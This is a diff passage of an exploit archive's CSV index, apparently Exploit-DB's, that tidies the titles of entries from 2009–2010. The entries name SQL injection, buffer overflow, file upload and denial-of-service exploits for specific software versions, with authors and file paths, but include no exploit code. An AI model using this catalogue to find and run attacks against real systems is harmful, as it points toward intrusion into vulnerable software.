10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0 @@ -9701,12 +9701,12 @@ id,file,description,date,author,platform,type,port 10424,platforms/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,multiple,webapps,0 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Authentication Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 10426,platforms/linux/webapps/10426.txt,"[WS] upload - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 -10427,platforms/linux/webapps/10427.txt,"DigitalHive - Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 +10427,platforms/linux/webapps/10427.txt,"Digital Hive - Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",windows,webapps,80 10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 / 1.5 - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,multiple,webapps,80 -10432,platforms/multiple/webapps/10432.txt,"zabbix server - Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 +10432,platforms/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic ",linux,webapps,80 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,php,webapps,0 @@ -9759,7 +9759,7 @@ id,file,description,date,author,platform,type,port 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0 -10496,platforms/asp/webapps/10496.txt,"freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 @@ -9850,7 +9850,7 @@ id,file,description,date,author,platform,type,port 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Arbitrary File Upload",2009-12-22,MR.Z,php,webapps,0 10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Exploit",2009-12-22,d3b4g,windows,local,0 -10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 +10603,platforms/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany - SQL Injection",2009-12-22,Gamoscu,php,webapps,0 10609,platforms/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,php,webapps,0 @@ -9890,7 +9890,7 @@ id,file,description,date,author,platform,type,port 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10655,platforms/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 +10656,platforms/php/webapps/10656.txt,"SoftBiz B2B trading Marketplace Script - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10660,platforms/php/webapps/10660.txt,"barbo91 uploads - Arbitrary File Upload",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 @@ -9971,7 +9971,7 @@ id,file,description,date,author,platform,type,port 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 -10747,platforms/windows/local/10747.py,"Mini-stream - Windows XP SP2 and SP3 Exploit",2009-12-27,dijital1,windows,local,0 +10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 @@ -10191,7 +10191,7 @@ id,file,description,date,author,platform,type,port 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0 11076,platforms/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 -11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 - (Win XP SP2/SP3 English) Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 +11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game - (game) SQL Injection",2010-01-10,Err0R,php,webapps,0 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injections",2010-01-10,Cyber_945,php,webapps,0 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 @@ -10408,7 +10408,7 @@ id,file,description,date,author,platform,type,port 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0 11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 -11347,platforms/windows/dos/11347.html,"Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 +11347,platforms/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0 @@ -10529,7 +10529,7 @@ id,file,description,date,author,platform,type,port 11488,platforms/php/webapps/11488.txt,"Auktionshaus Gelb 3 - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 -11491,platforms/multiple/local/11491.rb,"iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 +11491,platforms/multiple/local/11491.rb,"Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0 11494,platforms/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,"AtT4CKxT3rR0r1ST ",php,webapps,0 11495,platforms/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10591,7 +10591,7 @@ id,file,description,date,author,platform,type,port 11563,platforms/php/webapps/11563.txt,"kalimat new system 1.0 - 'index.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0 11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,php,webapps,0 11565,platforms/php/webapps/11565.txt,"PHPCOIN 1.2.1 - (mod.php) SQL Injection",2010-02-24,BAYBORA,php,webapps,0 -11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0 +11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)",2010-02-24,"Rad L. Sneak",multiple,dos,0 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script - Multiple SQL Injections",2010-02-24,"Easy Laster",php,webapps,0 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 @@ -10621,7 +10621,7 @@ id,file,description,date,author,platform,type,port 11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC",2010-02-28,ad0nis,hardware,dos,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 -11601,platforms/windows/dos/11601.pl,"Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 +11601,platforms/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11603,platforms/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0 11604,platforms/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 @@ -10662,7 +10662,7 @@ id,file,description,date,author,platform,type,port 11644,platforms/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow Denial of Service",2010-03-06,l3D,multiple,dos,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls'/ '.ypl' Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 -11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 +11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0 @@ -10833,7 +10833,7 @@ id,file,description,date,author,platform,type,port 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 -11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 +11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - 'index.php' (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 @@ -10876,8 +10876,8 @@ id,file,description,date,author,platform,type,port 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusion",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,php,webapps,0 -11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad 'VML' Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 -11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 +11890,platforms/ios/dos/11890.txt,"Apple iOS Safari - Bad 'VML' Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 +11891,platforms/ios/dos/11891.txt,"Apple iOS Safari - Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card - 'catid' SQL Injection",2010-03-26,"Hussin X",php,webapps,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 - Denial of Service",2010-03-26,OrderZero,linux,dos,0 11894,platforms/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 @@ -10943,7 +10943,7 @@ id,file,description,date,author,platform,type,port 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-PHP-dynamic - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 -11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 +11974,platforms/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - Exploit (1)",2010-03-30,"Richard leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) Stack Buffer Overflow (PoC)",2010-03-31,mr_me,windows,local,0 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 @@ -10954,7 +10954,7 @@ id,file,description,date,author,platform,type,port 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",linux,remote,0 -11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0 +11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0 11989,platforms/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 11990,platforms/php/webapps/11990.txt,"Joomla! Component com_network - SQL Injection",2010-04-01,"DevilZ TM",php,webapps,0 11991,platforms/php/webapps/11991.txt,"Joomla! Component com_tour - SQL Injection",2010-04-01,"DevilZ TM",php,webapps,0 @@ -10974,7 +10974,7 @@ id,file,description,date,author,platform,type,port 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0 -12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 +12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0 @@ -10999,7 +10999,7 @@ id,file,description,date,author,platform,type,port 12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0 -12037,platforms/php/webapps/12037.txt,"Joomla! Component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 +12037,platforms/php/webapps/12037.txt,"Joomla! Component com_jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 @@ -11150,7 +11150,7 @@ id,file,description,date,author,platform,type,port 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 -12200,platforms/php/webapps/12200.txt,"Joomla! Component QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0 +12200,platforms/php/webapps/12200.txt,"Joomla! Component com_QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0 12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos,0 12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 @@ -11165,7 +11165,7 @@ id,file,description,date,author,platform,type,port 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 12220,platforms/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps,0 -12221,platforms/php/webapps/12221.rb,"Bild Flirt 1.0 - SQL Injection",2010-04-14,"Easy Laster",php,webapps,0 +12221,platforms/php/webapps/12221.rb,"Bild Flirt System 1.0 - SQL Injection",2010-04-14,"Easy Laster",php,webapps,0 12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,php,webapps,0 12223,platforms/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,php,webapps,0 12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Arbitrary File Upload",2010-04-14,indoushka,php,webapps,0 @@ -11327,7 +11327,7 @@ id,file,description,date,author,platform,type,port 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 12406,platforms/windows/local/12406.py,"Avast! 4.7 - 'aavmker4.sys' Privilege Escalation",2010-04-27,ryujin,windows,local,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 +12408,platforms/windows/dos/12408.pl,"Apple Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 @@ -11342,7 +11342,7 @@ id,file,description,date,author,platform,type,port 12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - '.m3u' (PoC)",2010-04-27,chap0,windows,dos,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 -12425,platforms/windows/dos/12425.html,"Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0 +12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0 12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite com_smartsite - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 @@ -11354,7 +11354,7 @@ id,file,description,date,author,platform,type,port 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 -12437,platforms/windows/dos/12437.html,"Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 +12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 @@ -11465,8 +11465,8 @@ id,file,description,date,author,platform,type,port 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 -12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 -12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support - Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0 +12560,platforms/php/webapps/12560.txt,"724CMS 4.59 Enterprise - SQL Injection",2010-05-10,cyberlog,php,webapps,0 +12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 @@ -11505,7 +11505,7 @@ id,file,description,date,author,platform,type,port 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 -12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 +12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 